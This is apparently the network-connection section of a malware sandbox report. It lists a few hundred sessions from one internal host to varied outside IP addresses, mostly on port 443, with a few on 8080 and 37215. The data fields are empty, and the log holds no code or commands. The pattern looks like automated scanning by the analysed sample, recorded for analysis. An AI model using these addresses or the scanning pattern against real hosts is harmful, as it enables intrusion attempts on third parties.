                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10319192.168.2.1434756117.146.188.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10320192.168.2.144838880.187.103.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10321192.168.2.1451800188.75.208.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10322192.168.2.145081859.136.11.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10323192.168.2.1452590155.222.116.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10324192.168.2.145418490.118.43.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10325192.168.2.1450080184.114.212.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10326192.168.2.145508666.197.29.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10327192.168.2.1438682151.136.203.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10328192.168.2.1439346161.91.204.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10329192.168.2.1458330119.235.177.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10330192.168.2.1445744223.123.229.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10331192.168.2.144044848.88.114.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10332192.168.2.1444840222.241.200.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10333192.168.2.1457766183.114.207.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10334192.168.2.1451186132.210.27.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10335192.168.2.1454020197.255.78.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10336192.168.2.144690617.59.160.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10337192.168.2.1444208220.49.156.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10338192.168.2.1457382174.134.117.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10339192.168.2.144202814.250.209.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10340192.168.2.1458876184.74.19.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10341192.168.2.1448876159.240.122.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10342192.168.2.1452718193.90.118.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10343192.168.2.1450938181.50.219.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10344192.168.2.145373477.23.202.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10345192.168.2.143291253.220.11.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10346192.168.2.143682013.170.69.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10347192.168.2.143754213.234.245.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10348192.168.2.14512845.213.157.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10349192.168.2.145891883.201.117.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10350192.168.2.143932497.165.112.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10351192.168.2.1450068173.140.78.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10352192.168.2.1443844130.11.160.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10353192.168.2.1441284119.174.224.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10354192.168.2.1436830102.148.178.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10355192.168.2.145413264.169.234.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10356192.168.2.1433140206.206.49.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10357192.168.2.1456542158.203.4.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10358192.168.2.14478689.168.2.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10359192.168.2.1435764110.112.152.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10360192.168.2.1445116110.33.97.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10361192.168.2.1443988204.45.54.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10362192.168.2.1460400205.219.174.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10363192.168.2.1454106206.166.241.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10364192.168.2.1438702195.108.18.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10365192.168.2.1455056168.10.54.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10366192.168.2.144921225.13.227.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10367192.168.2.1452782212.215.198.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10368192.168.2.1434184103.148.195.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10369192.168.2.143642686.45.82.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10370192.168.2.143683485.84.45.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10371192.168.2.1438968163.203.174.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10372192.168.2.143866468.17.70.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10373192.168.2.1442014162.227.23.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10374192.168.2.1450532104.162.145.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10375192.168.2.1433240190.199.102.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10376192.168.2.1438496168.8.167.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10377192.168.2.1452248128.90.28.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10378192.168.2.144095062.226.209.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10379192.168.2.1447650175.236.172.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10380192.168.2.1445392133.250.64.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10381192.168.2.143825250.92.118.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10382192.168.2.144740223.156.248.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10383192.168.2.143780688.188.21.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10384192.168.2.1443294167.127.60.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10385192.168.2.1446148145.184.220.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10386192.168.2.1451646131.201.106.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10387192.168.2.144315871.208.189.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10388192.168.2.1441884152.129.179.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10389192.168.2.1441574182.11.111.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10390192.168.2.1434264164.60.74.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10391192.168.2.1460220213.214.26.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10392192.168.2.1442410196.151.137.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10393192.168.2.1457298133.212.17.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10394192.168.2.1449024150.49.91.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10395192.168.2.1456692167.7.80.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10396192.168.2.144561472.98.23.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10397192.168.2.1444624123.133.241.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10398192.168.2.143494258.174.116.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10399192.168.2.145174412.108.231.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10400192.168.2.143570282.153.244.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10401192.168.2.1449950177.121.18.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10402192.168.2.143280049.60.67.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10403192.168.2.144307485.191.177.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10404192.168.2.1445768121.4.13.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10405192.168.2.1455760137.222.147.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10406192.168.2.144588247.246.97.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10407192.168.2.14390162.161.74.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10408192.168.2.1454564149.255.241.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10409192.168.2.1433952195.213.125.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10410192.168.2.14592601.245.180.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10411192.168.2.145009490.101.83.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10412192.168.2.1433758159.68.87.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10413192.168.2.144263290.187.218.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10414192.168.2.144460092.164.157.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10415192.168.2.1455346108.129.79.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10416192.168.2.1446444169.29.77.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10417192.168.2.144827052.231.29.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10418192.168.2.145536671.55.233.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10419192.168.2.1459642187.40.216.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10420192.168.2.1454218193.113.48.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10421192.168.2.1439000135.133.26.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10422192.168.2.145351294.203.82.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10423192.168.2.1448124173.209.204.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10424192.168.2.1453878178.88.242.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10425192.168.2.1445020148.244.187.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10426192.168.2.1460068151.114.107.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10427192.168.2.144419238.132.128.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10428192.168.2.144599437.136.108.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10429192.168.2.1441112212.176.139.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10430192.168.2.1442118117.115.61.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10431192.168.2.1458700192.236.21.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10432192.168.2.1439408175.182.49.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10433192.168.2.1446732207.5.78.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10434192.168.2.1448178148.176.242.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10435192.168.2.1437006125.195.79.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10436192.168.2.1454782207.176.65.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10437192.168.2.1452088171.134.164.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10438192.168.2.144839225.71.215.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10439192.168.2.1435700218.25.205.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10440192.168.2.144590640.6.12.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10441192.168.2.144032042.140.33.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10442192.168.2.145342068.59.137.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10443192.168.2.1443860182.255.188.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10444192.168.2.145719067.89.116.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10445192.168.2.145348819.157.159.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10446192.168.2.1443820162.104.157.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10447192.168.2.1449098158.99.217.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10448192.168.2.144267886.163.132.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10449192.168.2.1442114217.225.242.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10450192.168.2.1438558106.79.238.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10451192.168.2.143600080.140.56.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10452192.168.2.1459004220.218.200.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10453192.168.2.1433884223.78.102.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10454192.168.2.1450200221.87.108.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10455192.168.2.1454744119.82.183.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10456192.168.2.1448394158.23.215.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10457192.168.2.1438836117.11.212.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10458192.168.2.145359662.108.246.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10459192.168.2.1445722107.15.65.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10460192.168.2.1460922192.241.222.98080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10461192.168.2.1433850107.151.215.288080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10462192.168.2.1456152163.15.168.17437215
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10463192.168.2.145848441.207.107.10237215
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10464192.168.2.145011448.242.34.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10465192.168.2.1445068132.191.109.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10466192.168.2.14435069.54.39.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10467192.168.2.1444202130.4.25.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10468192.168.2.1437082102.240.176.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10469192.168.2.144571019.109.174.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10470192.168.2.14375164.161.241.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10471192.168.2.145116014.103.76.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10472192.168.2.1437396146.126.24.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10473192.168.2.1458158118.203.179.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10474192.168.2.145240636.243.212.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10475192.168.2.143292087.194.239.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10476192.168.2.143436266.0.108.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10477192.168.2.145750036.237.179.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10478192.168.2.1454922144.37.110.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10479192.168.2.1455978130.41.81.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10480192.168.2.144007664.94.155.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10481192.168.2.1434522105.173.199.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10482192.168.2.144806696.140.149.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10483192.168.2.144835061.111.13.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10484192.168.2.1443404159.214.237.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10485192.168.2.144838449.230.135.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10486192.168.2.144151274.22.136.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10487192.168.2.1452664100.26.105.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10488192.168.2.144204681.220.35.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10489192.168.2.1451792169.11.126.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10490192.168.2.1449654139.61.183.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10491192.168.2.1445184136.16.108.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10492192.168.2.143386625.128.0.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10493192.168.2.1435486198.251.195.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10494192.168.2.145089823.78.255.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10495192.168.2.144018219.10.15.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10496192.168.2.1437590114.85.174.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10497192.168.2.1445158114.151.200.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10498192.168.2.1450436129.81.66.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10499192.168.2.144914263.88.203.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10500192.168.2.143842097.71.176.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10501192.168.2.1459782211.193.213.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10502192.168.2.1438690202.135.230.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10503192.168.2.145877684.106.53.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10504192.168.2.1449396116.189.92.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10505192.168.2.145616063.119.184.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10506192.168.2.144439469.70.26.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10507192.168.2.145854450.99.226.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10508192.168.2.1434182220.249.15.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10509192.168.2.1449402146.56.251.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10510192.168.2.144716812.175.93.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10511192.168.2.1443898196.89.206.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10512192.168.2.1450818205.109.49.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10513192.168.2.1448464169.56.133.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10514192.168.2.1441498173.196.148.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10515192.168.2.1443676162.41.128.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10516192.168.2.145082478.116.131.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10517192.168.2.1458784165.170.166.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10518192.168.2.145285860.64.29.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10519192.168.2.1460790222.241.21.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10520192.168.2.14348429.232.125.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10521192.168.2.146055494.180.54.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10522192.168.2.1460290122.247.8.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10523192.168.2.1438994148.47.110.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10524192.168.2.1433272151.223.247.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10525192.168.2.1439638208.249.117.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10526192.168.2.1458074174.36.59.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10527192.168.2.1443274170.61.91.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10528192.168.2.1456834116.141.20.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10529192.168.2.1443968219.93.53.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10530192.168.2.144397251.216.109.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10531192.168.2.145914266.90.93.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10532192.168.2.146059449.157.198.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10533192.168.2.1454834104.152.177.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10534192.168.2.1433168197.187.252.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10535192.168.2.1460592157.217.220.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10536192.168.2.1441600137.240.213.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10537192.168.2.143805459.195.238.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10538192.168.2.145280439.217.82.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10539192.168.2.1442376209.227.186.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10540192.168.2.1445266173.241.3.18443
